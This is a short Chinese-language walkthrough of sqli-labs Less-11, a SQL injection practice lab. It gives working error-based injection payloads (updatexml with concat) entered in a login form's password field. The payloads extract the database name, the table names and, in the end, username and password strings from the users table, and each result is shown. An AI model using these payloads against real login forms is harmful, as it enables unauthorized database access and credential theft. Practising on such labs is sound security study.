打开网页http://47.93.12.178:4567/Less-11/
看到输入用户名和密码

用户名随便写，密码套模板：'or(updatexml(1,concat(0x7e,(select database()),0x7e),1))or'1：
得到：XPATH syntax error: '~security~'

用户名随便写，密码套模板：'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))or'1
得到：XPATH syntax error: '~emails,referers,uagents,users~'

用户名随便写，密码如果直接写查询用户名密码会显示字符串前几位
需要设置为字符串33到65位才可以得到正解，33和65是逐次增加算出来的：'and updatexml(1,substr((select GROUP_CONCAT(username,password) from security.users),33,65),2)#

最后得到：
XPATH syntax error: '@ssword,securecrappy,stupidstupi'
